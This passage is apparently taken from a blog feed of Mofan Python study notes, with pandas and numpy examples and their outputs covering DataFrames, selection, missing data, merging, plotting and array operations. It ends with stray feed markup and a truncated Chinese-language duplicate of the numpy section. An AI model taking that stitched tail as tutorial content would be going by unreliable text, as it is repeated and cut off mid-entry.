DatetimeIndex(['2016-01-01', '2016-01-02', '2016-01-03', '2016-01-04',
               '2016-01-05', '2016-01-06'],
              dtype='datetime64[ns]', freq='D')

Build a data table: pd.DataFrame(data, index, columns)

    pd.DataFrame(np.random.randn(6, 4), index=dates, columns=['a', 'b', 'c', 'd'])
    a b c d
    2016-01-01 0.014513 0.490584 -1.985363 -1.734158
    2016-01-02 1.694216 0.383375 -1.260541 -0.126581
    2016-01-03 0.475547 1.050239 0.897093 1.155942
    2016-01-04 0.126726 -1.169920 -1.876652 -1.245558
    2016-01-05 0.606119 0.648469 -1.367697 -0.822617
    2016-01-06 -0.615075 0.557680 -2.104794 0.114070

A table with the default index and column labels:

    pd.DataFrame(np.arange(12).reshape((3, 4)))
    0 1 2 3
    0 0 1 2 3
    1 4 5 6 7
    2 8 9 10 11

Use a dictionary to supply the values:

df = pd.DataFrame({'A': 1,
                   'B': pd.Timestamp('20130102'),
                   'C': pd.Series(1, index=list(range(4)), dtype='float32'),
                   'D': np.array([3] * 4, dtype='int32'),
                   'E': pd.Categorical(["test", "train", "test", "train"]),
                   'F': 'foo'})
df
    A B C D E F
    0 1 2013-01-02 1.0 3 test foo
    1 1 2013-01-02 1.0 3 train foo
    2 1 2013-01-02 1.0 3 test foo
    3 1 2013-01-02 1.0 3 train foo

The dtype of each column:

df.dtypes
A             int64
B    datetime64[ns]
C           float32
D             int32
E          category
F            object
dtype: object

The index of the table:

    df.index
    Int64Index([0, 1, 2, 3], dtype='int64')

The column names of the table:

    df.columns
    Index(['A', 'B', 'C', 'D', 'E', 'F'], dtype='object')

The underlying values, row by row:

df.values
array([[1, Timestamp('2013-01-02 00:00:00'), 1.0, 3, 'test', 'foo'],
       [1, Timestamp('2013-01-02 00:00:00'), 1.0, 3, 'train', 'foo'],
       [1, Timestamp('2013-01-02 00:00:00'), 1.0, 3, 'test', 'foo'],
       [1, Timestamp('2013-01-02 00:00:00'), 1.0, 3, 'train', 'foo']],
      dtype=object)

Summary statistics of the numeric columns:

    df.describe()
    A C D
    count 4.0 4.0 4.0
    mean 1.0 1.0 3.0
    std 0.0 0.0 0.0
    min 1.0 1.0 3.0
    25% 1.0 1.0 3.0
    50% 1.0 1.0 3.0
    75% 1.0 1.0 3.0
    max 1.0 1.0 3.0

Transpose the table:

    df.T
    0 1 2 3
    A 1 1 1 1
    B 2013-01-02 00:00:00 2013-01-02 00:00:00 2013-01-02 00:00:00 2013-01-02 00:00:00
    C 1.0 1.0 1.0 1.0
    D 3 3 3 3
    E test train test train
    F foo foo foo foo

Sort the table:

df.sort_index(axis=1, ascending=False)  # sort by the column labels, in descending order
    F E D C B A
    0 foo test 3 1.0 2013-01-02 1
    1 foo train 3 1.0 2013-01-02 1
    2 foo test 3 1.0 2013-01-02 1
    3 foo train 3 1.0 2013-01-02 1
    df.sort_index(axis=0, ascending=False)
    A B C D E F
    3 1 2013-01-02 1.0 3 train foo
    2 1 2013-01-02 1.0 3 test foo
    1 1 2013-01-02 1.0 3 train foo
    0 1 2013-01-02 1.0 3 test foo
    df.sort_values(by='E')
    A B C D E F
    0 1 2013-01-02 1.0 3 test foo
    2 1 2013-01-02 1.0 3 test foo
    1 1 2013-01-02 1.0 3 train foo
    3 1 2013-01-02 1.0 3 train foo

3.2 Selecting data in pandas

    import pandas as pd
    import numpy as np

    dates = pd.date_range('20130101', periods=6)
    df = pd.DataFrame(np.arange(24).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])
    df
    A B C D
    2013-01-01 0 1 2 3
    2013-01-02 4 5 6 7
    2013-01-03 8 9 10 11
    2013-01-04 12 13 14 15
    2013-01-05 16 17 18 19
    2013-01-06 20 21 22 23

Select all the data in column A:

df.A
2013-01-01     0
2013-01-02     4
2013-01-03     8
2013-01-04    12
2013-01-05    16
2013-01-06    20
Freq: D, Name: A, dtype: int32
df['A']
2013-01-01     0
2013-01-02     4
2013-01-03     8
2013-01-04    12
2013-01-05    16
2013-01-06    20
Freq: D, Name: A, dtype: int32

Select whole rows by slicing:

    df[0:3]
    A B C D
    2013-01-01 0 1 2 3
    2013-01-02 4 5 6 7
    2013-01-03 8 9 10 11
    df['20130102':'20130104']
    A B C D
    2013-01-02 4 5 6 7
    2013-01-03 8 9 10 11
    2013-01-04 12 13 14 15

Select by label with loc:

df.loc['20130102']
A    4
B    5
C    6
D    7
Name: 2013-01-02 00:00:00, dtype: int32
    df.loc[:, ['A', 'B']]
    A B
    2013-01-01 0 1
    2013-01-02 4 5
    2013-01-03 8 9
    2013-01-04 12 13
    2013-01-05 16 17
    2013-01-06 20 21
df.loc['20130102', ['A', 'B']]
A    4
B    5
Name: 2013-01-02 00:00:00, dtype: int32

Select by position with iloc:

df.iloc[3]
A    12
B    13
C    14
D    15
Name: 2013-01-04 00:00:00, dtype: int32
df.iloc[3, 1]
13
    df.iloc[3:5, 1:3]
    B C
    2013-01-04 13 14
    2013-01-05 17 18
    df.iloc[[1, 3, 5], 1:3]
    B C
    2013-01-02 5 6
    2013-01-04 13 14
    2013-01-06 21 22

Mixed label/position selection with ix (removed from recent pandas):

df.ix[:3, ['A', 'C']]  # no longer available in newer versions
---------------------------------------------------------------------------
AttributeError                            Traceback (most recent call last)
Input In [27], in <cell line: 1>()
----> 1 df.ix[:3, ['A', 'C']]
File ~\anaconda3\lib\site-packages\pandas\core\generic.py:5575, in NDFrame.__getattr__(self, name)
   5568 if (
   5569     name not in self._internal_names_set
   5570     and name not in self._metadata
   5571     and name not in self._accessors
   5572     and self._info_axis._can_hold_identifiers_and_holds_name(name)
   5573 ):
   5574     return self[name]
-> 5575 return object.__getattribute__(self, name)
AttributeError: 'DataFrame' object has no attribute 'ix'
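
In current pandas the same selection is written with loc (or iloc); a minimal equivalent for this df:

df.loc[df.index[:3], ['A', 'C']]  # first three rows, columns A and C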

Boolean filtering:

df[df.A > 8]  # the condition only tests column A, but the whole rows (A-D) are returned
    A B C D
    2013-01-04 12 13 14 15
    2013-01-05 16 17 18 19
    2013-01-06 20 21 22 23
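
Conditions can be combined as well; each one goes in parentheses and is joined with & or |. A small sketch against the same df:

df[(df.A > 4) & (df.D < 20)]  # rows where A > 4 and D < 20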

3.3 Setting values in pandas

    import pandas as pd
    import numpy as np

    dates = pd.date_range('20130101', periods=6)
    df = pd.DataFrame(np.arange(24).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])
dates
DatetimeIndex(['2013-01-01', '2013-01-02', '2013-01-03', '2013-01-04',
               '2013-01-05', '2013-01-06'],
              dtype='datetime64[ns]', freq='D')
    df
    A B C D
    2013-01-01 0 1 2 3
    2013-01-02 4 5 6 7
    2013-01-03 8 9 10 11
    2013-01-04 12 13 14 15
    2013-01-05 16 17 18 19
    2013-01-06 20 21 22 23

Modify values in the table:

    df.iloc[2, 2] = 1111
    df.loc['20130101', 'B'] = 2222
    df[df.A > 4] = 0
    df.B[df.A > 4] = 0
    df
    A B C D
    2013-01-01 0 2222 2 3
    2013-01-02 4 5 6 7
    2013-01-03 0 0 1111 0
    2013-01-04 0 0 0 0
    2013-01-05 0 0 0 0
    2013-01-06 0 0 0 0

Add an empty column to the table:

    df['F'] = np.nan
    df
    A B C D F
    2013-01-01 0 2222 2 3 NaN
    2013-01-02 4 5 6 7 NaN
    2013-01-03 0 0 1111 0 NaN
    2013-01-04 0 0 0 0 NaN
    2013-01-05 0 0 0 0 NaN
    2013-01-06 0 0 0 0 NaN
    df['E'] = pd.Series([1, 2, 3, 4, 5, 6], index=pd.date_range('20130101', periods=6))
    df
    A B C D F E
    2013-01-01 0 2222 2 3 NaN 1
    2013-01-02 4 5 6 7 NaN 2
    2013-01-03 0 0 1111 0 NaN 3
    2013-01-04 0 0 0 0 NaN 4
    2013-01-05 0 0 0 0 NaN 5
    2013-01-06 0 0 0 0 NaN 6

3.4 Handling missing data in pandas

    import pandas as pd
    import numpy as np

    dates = pd.date_range('20130101', periods=6)
    df = pd.DataFrame(np.arange(24).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])
    df.iloc[0, 1] = np.nan
    df.iloc[1, 2] = np.nan
    df
    A B C D
    2013-01-01 0 NaN 2.0 3
    2013-01-02 4 5.0 NaN 7
    2013-01-03 8 9.0 10.0 11
    2013-01-04 12 13.0 14.0 15
    2013-01-05 16 17.0 18.0 19
    2013-01-06 20 21.0 22.0 23

Drop rows containing NaN:

df.dropna(axis=0, how='any')  # how='any': drop a row that has any NaN; how='all': drop it only if every value is NaN
    A B C D
    2013-01-03 8 9.0 10.0 11
    2013-01-04 12 13.0 14.0 15
    2013-01-05 16 17.0 18.0 19
    2013-01-06 20 21.0 22.0 23

Replace NaN with another value:

    df.fillna(value=0)
    A B C D
    2013-01-01 0 0.0 2.0 3
    2013-01-02 4 5.0 0.0 7
    2013-01-03 8 9.0 10.0 11
    2013-01-04 12 13.0 14.0 15
    2013-01-05 16 17.0 18.0 19
    2013-01-06 20 21.0 22.0 23

Check whether the table contains missing data:

    df.isna()
    A B C D
    2013-01-01 False True False False
    2013-01-02 False False True False
    2013-01-03 False False False False
    2013-01-04 False False False False
    2013-01-05 False False False False
    2013-01-06 False False False False
    df.isnull()
    A B C D
    2013-01-01 False True False False
    2013-01-02 False False True False
    2013-01-03 False False False False
    2013-01-04 False False False False
    2013-01-05 False False False False
    2013-01-06 False False False False
np.any(df.isnull() is True)  # meant to return True when data is missing; see the note below
    False
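
Note that this check is actually broken: df.isnull() returns a DataFrame, and the expression df.isnull() is True tests object identity against the singleton True, so the whole thing is always False, even though the table above clearly contains NaN. A corrected check:

df.isnull().values.any()  # True here: columns B and C contain NaN
df.isnull().any().any()   # equivalent spelling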

3.5 3-D data

import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D

fig = plt.figure()  # create a new figure window
ax = Axes3D(fig, auto_add_to_figure=False)  # add a set of 3-D axes
fig.add_axes(ax)

# input data
    X = np.arange(-4, 4, 0.25)
    Y = np.arange(-4, 4, 0.25)
    X, Y = np.meshgrid(X, Y)
    R = np.sqrt(X ** 2 + Y ** 2)
    Z = np.sin(R)

    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))
    ax.contourf(X, Y, Z, zdir='z', offset=-2, cmap='rainbow')
    ax.set_zlim(-2, 2)

    plt.show()

    png

3.6 Combining DataFrames with concat

    import pandas as pd 
    import numpy as np

    concatenating

    df1 = pd.DataFrame(np.ones((3, 4)) * 0, columns=['a', 'b', 'c', 'd'])
    df2 = pd.DataFrame(np.ones((3, 4)) * 1, columns=['a', 'b', 'c', 'd'])
    df3 = pd.DataFrame(np.ones((3, 4)) * 2, columns=['a', 'b', 'c', 'd'])
    df1
    a b c d
    0 0.0 0.0 0.0 0.0
    1 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0
    df2
    a b c d
    0 1.0 1.0 1.0 1.0
    1 1.0 1.0 1.0 1.0
    2 1.0 1.0 1.0 1.0
    df3
    a b c d
    0 2.0 2.0 2.0 2.0
    1 2.0 2.0 2.0 2.0
    2 2.0 2.0 2.0 2.0

Stack them vertically:

pd.concat([df1, df2, df3], axis=0)  # axis=0 stacks along the rows (vertically); axis=1 would align along the columns
    a b c d
    0 0.0 0.0 0.0 0.0
    1 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0
    0 1.0 1.0 1.0 1.0
    1 1.0 1.0 1.0 1.0
    2 1.0 1.0 1.0 1.0
    0 2.0 2.0 2.0 2.0
    1 2.0 2.0 2.0 2.0
    2 2.0 2.0 2.0 2.0
pd.concat([df1, df2, df3], axis=0, ignore_index=True)  # rebuild the index from 0
    a b c d
    0 0.0 0.0 0.0 0.0
    1 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0
    3 1.0 1.0 1.0 1.0
    4 1.0 1.0 1.0 1.0
    5 1.0 1.0 1.0 1.0
    6 2.0 2.0 2.0 2.0
    7 2.0 2.0 2.0 2.0
    8 2.0 2.0 2.0 2.0

join, ['inner', 'outer']

    df1 = pd.DataFrame(np.ones((3, 4)) * 0, columns=['a', 'b', 'c', 'd'])
    df2 = pd.DataFrame(np.ones((3, 4)) * 1, columns=['b', 'c', 'd', 'e'])
    df1
    a b c d
    0 0.0 0.0 0.0 0.0
    1 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0
    df2
    b c d e
    0 1.0 1.0 1.0 1.0
    1 1.0 1.0 1.0 1.0
    2 1.0 1.0 1.0 1.0

A plain outer join keeps every column and fills the gaps with NaN:

pd.concat([df1, df2], join='outer')
    a b c d e
    0 0.0 0.0 0.0 0.0 NaN
    1 0.0 0.0 0.0 0.0 NaN
    2 0.0 0.0 0.0 0.0 NaN
    0 NaN 1.0 1.0 1.0 1.0
    1 NaN 1.0 1.0 1.0 1.0
    2 NaN 1.0 1.0 1.0 1.0
pd.concat([df1, df2], join='inner') # keep only the columns shared by both frames
    b c d
    0 0.0 0.0 0.0
    1 0.0 0.0 0.0
    2 0.0 0.0 0.0
    0 1.0 1.0 1.0
    1 1.0 1.0 1.0
    2 1.0 1.0 1.0
    pd.concat([df1, df2], join='inner', ignore_index=True)
    b c d
    0 0.0 0.0 0.0
    1 0.0 0.0 0.0
    2 0.0 0.0 0.0
    3 1.0 1.0 1.0
    4 1.0 1.0 1.0
    5 1.0 1.0 1.0

Concatenating aligned to one frame's index

pd.concat([df1, df2], axis=1, join_axes=[df1.index])
TypeError: concat() got an unexpected keyword argument 'join_axes'

The join_axes argument was removed in pandas 1.0, so on current versions this call raises the TypeError above.
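The modern replacement aligns the result to an index with reindex. A sketch assuming the same df1/df2:

pd.concat([df1, df2], axis=1).reindex(df1.index) # keep only the rows present in df1's index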

append is deprecated and will be removed; it is not recommended

    df1.append([df2, df3])
C:\Users\gzjzx\AppData\Local\Temp\ipykernel_10380\266511466.py:1: FutureWarning: The frame.append method is deprecated and will be removed from pandas in a future version. Use pandas.concat instead.
  df1.append([df2, df3])
    a b c d e
    0 0.0 0.0 0.0 0.0 NaN
    1 0.0 0.0 0.0 0.0 NaN
    2 0.0 0.0 0.0 0.0 NaN
    0 NaN 1.0 1.0 1.0 1.0
    1 NaN 1.0 1.0 1.0 1.0
    2 NaN 1.0 1.0 1.0 1.0
    0 2.0 2.0 2.0 2.0 NaN
    1 2.0 2.0 2.0 2.0 NaN
    2 2.0 2.0 2.0 2.0 NaN
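The drop-in replacement suggested by the warning is concat. A sketch:

pd.concat([df1, df2, df3])                    # same result as df1.append([df2, df3])
pd.concat([df1, df2, df3], ignore_index=True) # with a rebuilt 0..n-1 index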

3.7 pandas merging: merge

import pandas as pd

left = pd.DataFrame({'key': ['K0', 'K1', 'K2', 'K3'],
                     'A': ['A0', 'A1', 'A2', 'A3'],
                     'B': ['B0', 'B1', 'B2', 'B3']})
right = pd.DataFrame({'key': ['K0', 'K1', 'K2', 'K3'],
                      'C': ['C0', 'C1', 'C2', 'C3'],
                      'D': ['D0', 'D1', 'D2', 'D3']})
    left
    key A B
    0 K0 A0 B0
    1 K1 A1 B1
    2 K2 A2 B2
    3 K3 A3 B3
    right
    key C D
    0 K0 C0 D0
    1 K1 C1 D1
    2 K2 C2 D2
    3 K3 C3 D3
    pd.merge(left, right, on='key')
    key A B C D
    0 K0 A0 B0 C0 D0
    1 K1 A1 B1 C1 D1
    2 K2 A2 B2 C2 D2
    3 K3 A3 B3 C3 D3

Merging on two keys

left = pd.DataFrame({'key1': ['K0', 'K0', 'K1', 'K2'],
                     'key2': ['K0', 'K1', 'K0', 'K1'],
                     'A': ['A0', 'A1', 'A2', 'A3'],
                     'B': ['B0', 'B1', 'B2', 'B3']})
right = pd.DataFrame({'key1': ['K0', 'K1', 'K1', 'K2'],
                      'key2': ['K0', 'K0', 'K0', 'K0'],
                      'C': ['C0', 'C1', 'C2', 'C3'],
                      'D': ['D0', 'D1', 'D2', 'D3']})
left
    key1 key2 A B
    0 K0 K0 A0 B0
    1 K0 K1 A1 B1
    2 K1 K0 A2 B2
    3 K2 K1 A3 B3
    right
    key1 key2 C D
    0 K0 K0 C0 D0
    1 K1 K0 C1 D1
    2 K1 K0 C2 D2
    3 K2 K0 C3 D3
    pd.merge(left, right, on=['key1', 'key2'], how='inner')
    key1 key2 A B C D
    0 K0 K0 A0 B0 C0 D0
    1 K1 K0 A2 B2 C1 D1
    2 K1 K0 A2 B2 C2 D2
    pd.merge(left, right, on=['key1', 'key2'], how='outer')
    key1 key2 A B C D
    0 K0 K0 A0 B0 C0 D0
    1 K0 K1 A1 B1 NaN NaN
    2 K1 K0 A2 B2 C1 D1
    3 K1 K0 A2 B2 C2 D2
    4 K2 K1 A3 B3 NaN NaN
    5 K2 K0 NaN NaN C3 D3
    pd.merge(left, right, on=['key1', 'key2'], how='left')
    key1 key2 A B C D
    0 K0 K0 A0 B0 C0 D0
    1 K0 K1 A1 B1 NaN NaN
    2 K1 K0 A2 B2 C1 D1
    3 K1 K0 A2 B2 C2 D2
    4 K2 K1 A3 B3 NaN NaN
pd.merge(left, right, on=['key1', 'key2'], how='right', indicator=True) # indicator adds a _merge column recording how each row was matched
    key1 key2 A B C D _merge
    0 K0 K0 A0 B0 C0 D0 both
    1 K1 K0 A2 B2 C1 D1 both
    2 K1 K0 A2 B2 C2 D2 both
    3 K2 K0 NaN NaN C3 D3 right_only
pd.merge(left, right, on=['key1', 'key2'], how='right', indicator="indicator_column") # passing a string names the indicator column
    key1 key2 A B C D indicator_column
    0 K0 K0 A0 B0 C0 D0 both
    1 K1 K0 A2 B2 C1 D1 both
    2 K1 K0 A2 B2 C2 D2 both
    3 K2 K0 NaN NaN C3 D3 right_only
    pd.merge(left, right, left_index=True, right_index=True, how='outer')
    key1_x key2_x A B key1_y key2_y C D
    0 K0 K0 A0 B0 K0 K0 C0 D0
    1 K0 K1 A1 B1 K1 K0 C1 D1
    2 K1 K0 A2 B2 K1 K0 C2 D2
    3 K2 K1 A3 B3 K2 K0 C3 D3

Handling column-name collisions caused by merging

boys = pd.DataFrame({'k': ['K0', 'K1', 'K2'], 'age': [1, 2, 3]})
girls = pd.DataFrame({'k': ['K0', 'K1', 'K2'], 'age': [4, 5, 6]})
boys
    boys
    k age
    0 K0 1
    1 K1 2
    2 K2 3
    girls
    k age
    0 K0 4
    1 K1 5
    2 K2 6
    pd.merge(boys, girls, on='k', suffixes=['_boy', '_girl'], how='inner')
    k age_boy age_girl
    0 K0 1 4
    1 K1 2 5
    2 K2 3 6
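merge can also assert the expected key relationship with validate, which raises if the assumption is violated. A sketch (not covered in the original notes):

pd.merge(boys, girls, on='k', suffixes=['_boy', '_girl'], validate='one_to_one') # each k must appear at most once on each side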

3.8 Plotting with pandas

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt

Line plot of a Series

data = pd.Series(np.random.randn(1000), index=np.arange(1000)).cumsum()
data
0      -1.287330
1      -1.293898
2      -0.166798
3      -1.177414
4      -1.890751
         ...
995    10.204522
996    10.308410
997     7.887580
998     8.327458
999     9.105820
Length: 1000, dtype: float64
data.plot()
plt.show()

(figure: line plot of the cumulative-sum Series)

Line plot of a DataFrame

data = pd.DataFrame(np.random.randn(1000, 4), index=np.arange(1000), columns=list('ABCD')).cumsum()
data
    A B C D
    0 0.020454 -1.172689 1.843716 1.544707
    1 -0.097744 0.989506 1.068073 2.404901
    2 -0.273196 0.758510 -1.905761 3.836764
    3 0.401259 1.408281 -2.043875 3.762166
    4 1.821346 0.941836 -1.549852 4.347704
    ... ... ... ... ...
    995 -4.775217 -18.948179 -47.410079 -53.719370
    996 -3.830409 -19.661865 -46.040664 -54.201339
    997 -3.061518 -20.368645 -46.068266 -54.682348
    998 -3.447858 -21.113475 -46.808006 -54.889304
    999 -2.270221 -21.544267 -46.512128 -54.953465

    1000 rows × 4 columns

data.plot()
plt.show()

(figure: four line plots, one per column A-D)

plot supports many other kinds: bar, hist, box, kde, area, scatter, hexbin, pie, and more. The scatter example below draws two classes on the same axes.
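As a sketch of a couple of those kinds (not in the original notes), using the same data frame:

data['A'].plot.hist(bins=50) # histogram of one column
data.plot.box()              # one box plot per column
plt.show()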

    ax = data.plot.scatter(x='A', y='B', color='DarkBlue', label='Class1')
    data.plot.scatter(x='A', y='C', color='DarkGreen', label='Class2', ax=ax)
    plt.show()

(figure: two scatter series, Class1 and Class2, on shared axes)

Python: Mofan (莫烦) Python learning notes (numpy)

Preface

Main text

2.1 numpy attributes

Import the numpy library, aliased as np

    import numpy as np

Create an array

array = np.array([[1, 2, 3],
                  [2, 3, 4]])

Print the array

print(array)
[[1 2 3]
 [2 3 4]]

Print the number of dimensions of the array

    print(array.ndim)
    2

Print the shape of the array

    print(array.shape)
    (2, 3)

Print the size of the array (total number of elements)

    print(array.size)
    6

2.2 Creating arrays in numpy

    import numpy as np

Specify the array's dtype

a = np.array([2, 23, 4], dtype=np.int64)

Print the array's dtype

    print(a.dtype)
    int64

Create a matrix of zeros

np.zeros((3, 4))
array([[0., 0., 0., 0.],
       [0., 0., 0., 0.],
       [0., 0., 0., 0.]])

Create a matrix of ones

np.ones((3, 4))
array([[1., 1., 1., 1.],
       [1., 1., 1., 1.],
       [1., 1., 1., 1.]])

Create an uninitialized matrix

The contents are whatever happens to be in memory: if no matrix was allocated before, values very close to 0; otherwise, leftovers from the previously allocated matrix.

np.empty((3, 4))
array([[1., 1., 1., 1.],
       [1., 1., 1., 1.],
       [1., 1., 1., 1.]])

Create an ordered sequence: np.arange(start, stop, step)

    np.arange(10, 20, 2)
    array([10, 12, 14, 16, 18])

Reshape an ordered sequence into a matrix

np.arange(12).reshape(3, 4)
array([[ 0,  1,  2,  3],
       [ 4,  5,  6,  7],
       [ 8,  9, 10, 11]])

Create evenly spaced values: np.linspace(start, stop, num)

    np.linspace(1, 10, 5)
    array([ 1.  ,  3.25,  5.5 ,  7.75, 10.  ])

Create evenly spaced values and reshape them into a matrix

np.linspace(1, 10, 6).reshape((2, 3))
array([[ 1. ,  2.8,  4.6],
       [ 6.4,  8.2, 10. ]])

2.3 Basic numpy operations

    import numpy as np

Create two arrays

a = np.array([10, 20, 30, 40])
b = np.arange(4)
print(a)
print(b)
[10 20 30 40]
[0 1 2 3]

Subtract the arrays

    a - b
    array([10, 19, 28, 37])

Elementwise power

    a ** b
    array([    1,    20,   900, 64000], dtype=int32)

Apply the sine function to each element of a

    np.sin(a)
    array([-0.54402111,  0.91294525, -0.98803162,  0.74511316])

Elementwise comparisons on b

    b < 3
    array([ True,  True,  True, False])
    b == 3
    array([False, False, False,  True])

Define 2-D matrices

a = np.array([[1, 1],
              [0, 1]])
b = b.reshape(2, 2)
print(a)
print(b)
[[1 1]
 [0 1]]
[[0 1]
 [2 3]]

Elementwise multiplication

a * b
array([[0, 1],
       [0, 3]])

Matrix multiplication

np.dot(a, b)
array([[2, 4],
       [2, 3]])
a.dot(b)
array([[2, 4],
       [2, 3]])
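Since Python 3.5 the @ operator is the idiomatic spelling of matrix multiplication. A sketch:

a @ b # same as np.dot(a, b) for 2-D arrays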

Create a randomly generated matrix with values in [0, 1)

a = np.random.random((2, 4))
print(a)
[[0.8173095  0.68161518 0.69519572 0.38590121]
 [0.75305129 0.12209991 0.31815067 0.08084771]]

Sum over the whole matrix

    np.sum(a)
    3.854171189705032

Minimum of the matrix

    np.min(a)
    0.08084770650268369

Sum along axis 1 (over each row)

    np.sum(a, axis=1)
    array([2.58002161, 1.27414958])

Sum along axis 0 (over each column)

    np.sum(a, axis=0)
    array([1.57036079, 0.80371509, 1.01334639, 0.46674891])

2.4 Basic numpy operations 2

    import numpy as np

Define a matrix

A = np.arange(2, 14).reshape((3, 4))
print(A)
[[ 2  3  4  5]
 [ 6  7  8  9]
 [10 11 12 13]]

Index of the minimum of A

    np.argmin(A)
    0

Index of the maximum of A

    np.argmax(A)
    11

Mean of A

    np.mean(A)
    7.5
    A.mean()
    7.5
    np.average(A)
    7.5

Median of A

    np.median(A)
    7.5

Cumulative sum of A

    np.cumsum(A)
    array([ 2,  5,  9, 14, 20, 27, 35, 44, 54, 65, 77, 90], dtype=int32)

Differences along A (each column minus the previous one)

np.diff(A)
array([[1, 1, 1],
       [1, 1, 1],
       [1, 1, 1]])

Indices of all nonzero entries of A (as row indices, column indices)

np.nonzero(A)
(array([0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2], dtype=int64),
 array([0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3], dtype=int64))

Sort each row of A

A = np.arange(14, 2, -1).reshape((3, 4))
print(A)
[[14 13 12 11]
 [10  9  8  7]
 [ 6  5  4  3]]
np.sort(A)
array([[11, 12, 13, 14],
       [ 7,  8,  9, 10],
       [ 3,  4,  5,  6]])

Transpose of the matrix

A.T
array([[14, 10,  6],
       [13,  9,  5],
       [12,  8,  4],
       [11,  7,  3]])
np.transpose(A)
array([[14, 10,  6],
       [13,  9,  5],
       [12,  8,  4],
       [11,  7,  3]])

Clip A's values to a minimum and a maximum

np.clip(A, 5, 9)
array([[9, 9, 9, 9],
       [9, 9, 8, 7],
       [6, 5, 5, 5]])

Column-wise mean of A

    np.mean(A, axis=0)
    array([10.,  9.,  8.,  7.])

2.5 numpy indexing

    import numpy as np

    A = np.arange(3, 15)
    print(A)
    [ 3  4  5  6  7  8  9 10 11 12 13 14]

The element at index 3 of A (indexing is zero-based)

    A[3]
    6
A = A.reshape((3, 4))
print(A)
[[ 3  4  5  6]
 [ 7  8  9 10]
 [11 12 13 14]]

The row at index 2 of A

    print(A[2])
    [11 12 13 14]

The element at row 1, column 1 of A

    A[1][1]
    8
    A[1, 1]
    8

The column at index 1 of A (the colon selects everything along that axis)

    A[:, 1]
    array([ 4,  8, 12])

Row 1 of A, columns 1 up to (but not including) 3

    A[1, 1:3]
    array([8, 9])

Print every row of A with a for loop

for row in A:
    print(row)
[3 4 5 6]
[ 7  8  9 10]
[11 12 13 14]

Print every column of A (iterate over the transpose)

for col in A.T:
    print(col)
[ 3  7 11]
[ 4  8 12]
[ 5  9 13]
[ 6 10 14]

Flatten A into a 1-D array

    A.flatten()
    array([ 3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14])

Iterate over every element of A

for item in A.flat:
    print(item, end=",")
    3,4,5,6,7,8,9,10,11,12,13,14,

2.6 Merging numpy arrays

    import numpy as np

    A = np.array([1, 1, 1])
    B = np.array([2, 2, 2])

Stack A and B vertically (vertical stack)

C = np.vstack((A, B))
print(C)
print(A.shape, C.shape)
[[1 1 1]
 [2 2 2]]
(3,) (2, 3)

Stack A and B horizontally (horizontal stack)

C = np.hstack((A, B))
print(C)
print(A.shape, C.shape)
[1 1 1 2 2 2]
(3,) (6,)

Turn A from a row vector into a column vector

A[:, np.newaxis]
array([[1],
       [1],
       [1]])

Stack the column vectors A and B

A = np.array([1, 1, 1])[:, np.newaxis]
B = np.array([2, 2, 2])[:, np.newaxis]
np.vstack((A, B))
array([[1],
       [1],
       [1],
       [2],
       [2],
       [2]])
np.hstack((A, B))
array([[1, 2],
       [1, 2],
       [1, 2]])

Choose the axis along which to concatenate

np.concatenate((A, B, B, A), axis=1) # for these column vectors, axis=0 behaves like vstack and axis=1 like hstack
array([[1, 2, 2, 1],
       [1, 2, 2, 1],
       [1, 2, 2, 1]])
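To make the axis correspondence concrete, both equalities below hold for these column vectors. A sketch (not in the original notes):

np.array_equal(np.concatenate((A, B), axis=0), np.vstack((A, B))) # True
np.array_equal(np.concatenate((A, B), axis=1), np.hstack((A, B))) # True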

2.7 Splitting numpy arrays

    import numpy as np

A = np.arange(12).reshape((3, 4))
print(A)
[[ 0  1  2  3]
 [ 4  5  6  7]
 [ 8  9 10 11]]

Split A into equal parts: np.split(array, sections, axis)

np.split(A, 2, axis=1)
[array([[0, 1],
        [4, 5],
        [8, 9]]), array([[ 2,  3],
        [ 6,  7],
        [10, 11]])]
np.split(A, 3, axis=0)
[array([[0, 1, 2, 3]]), array([[4, 5, 6, 7]]), array([[ 8,  9, 10, 11]])]
np.vsplit(A, 3)
[array([[0, 1, 2, 3]]), array([[4, 5, 6, 7]]), array([[ 8,  9, 10, 11]])]
np.hsplit(A, 2)
[array([[0, 1],
        [4, 5],
        [8, 9]]), array([[ 2,  3],
        [ 6,  7],
        [10, 11]])]

Unequal split with np.array_split()

np.array_split(A, 3, axis=1)
[array([[0, 1],
        [4, 5],
        [8, 9]]), array([[ 2],
        [ 6],
        [10]]), array([[ 3],
        [ 7],
        [11]])]

2.8 numpy copy & deep copy

    import numpy as np
    A = np.arange(4)
    print(A)
    [0 1 2 3]
    B = A
    C = A
    D = B
    A[0] = 11
    print(A)
    [11  1  2  3]

Check whether two names refer to the same object

    B is A
    True
    D is A
    True

A.copy()

With plain assignment above, changing A also changed B, C, and D, since all four names refer to one object. A.copy() returns an independent (deep) copy instead:

    B = A.copy() # deep copy
    B
    array([11,  1,  2,  3])

Now changing A's values does not change B

    A[3] = 44
    A
    array([11,  1,  2, 44])
    B
    array([11,  1,  2,  3])
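np.shares_memory makes the alias/copy distinction explicit. A sketch continuing from the state above (C2 is a hypothetical name introduced here):

np.shares_memory(A, B)  # False: B is an independent copy
C2 = A[1:3]             # slicing, by contrast, returns a view
np.shares_memory(A, C2) # True: the view still points into A's buffer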
    ]]>
    + 前言

    正文

    2.1numpy 属性

    导入 numpy 库,并简写为 np

    1
    import numpy as np

    创建一个数组

    1
    2
    array = np.array([[1, 2, 3],
    [2, 3, 4]])

    打印数组

    1
    print(array)
    [[1 2 3] [2 3 4]]

    打印数组的维度

    1
    print(array.ndim)
    2

    打印数组的形状

    1
    print(array.shape)
    (2, 3)

    打印数组的大小

    1
    print(array.size)
    6

    2.2 numpy 的创建 array

    1
    import numpy as np

    定义 array 的 dtype

    1
    a = np.array([2, 23, 4], dtype = np.int64)

    打印数组类型

    1
